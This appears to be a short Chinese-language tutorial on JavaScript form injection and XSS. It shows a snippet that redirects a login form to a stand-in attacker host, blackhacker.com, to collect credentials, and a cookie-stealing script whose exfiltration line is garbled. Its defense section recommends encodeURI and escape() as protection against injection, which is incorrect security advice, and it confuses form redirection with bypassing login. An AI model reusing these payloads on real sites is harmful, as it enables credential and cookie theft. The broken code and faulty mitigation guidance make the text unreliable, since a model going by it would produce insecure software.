JavaScript表單注入是一種黑客攻擊方式，主要是利用用戶提交的表單數據中，包含了特殊字符或代碼，從而在Server端未正確處理或過濾的情況下，執行惡意代碼，導致安全漏洞。

以一個簡單的登錄表單為例，我們可以通過注入攻擊，繞過登錄驗證，成功登錄系統。以下是攻擊者可能使用的攻擊代碼：

document.forms[0].action="http://blackhacker.com/login.jsp"; 
document.forms[0].submit();

注入上述代碼后，當用戶點擊登錄按鈕時，將自動提交到惡意網站，而非正常的登錄驗證頁面，攻擊者可以通過這種方式收集用戶信息或攻擊系統數據庫。

除了上述攻擊方式，還有一種叫做XSS（跨站腳本攻擊）的表單注入方式，其主要特點在于用戶提交的信息中，嵌入了惡意JavaScript代碼，從而實現攻擊目的。以下是一個簡單的XSS攻擊代碼：

<script type="text/javascript">
	alert(document.cookie); // 收集用戶cookie信息
	location.+document.cookie; // 將用戶信息發送到惡意站點
</script>

上述代碼將嘗試收集用戶cookie信息，并發送到惡意站點，攻擊者可以通過這種方式獲取用戶敏感信息，從而危及用戶隱私安全。

針對表單注入攻擊，應該采取相應的安全措施，例如輸入驗證、過濾和轉義等。我們可以通過JavaScript的encodeURI()、encodeURIComponent()和escape()等函數對用戶輸入進行轉義，防止攻擊者注入惡意代碼。

以下是對用戶輸入進行轉義的代碼：

var inputStr = document.getElementById('textInput').value;
var safeStr = encodeURI(inputStr); // 對用戶輸入進行轉義，防止表單注入攻擊
document.getElementById('safeInput').value = safeStr; // 將轉義后的內容填充到隱藏域中

通過對用戶提交的表單進行驗證、過濾和轉義等安全措施，可以有效避免表單注入攻擊，并提高系統安全性。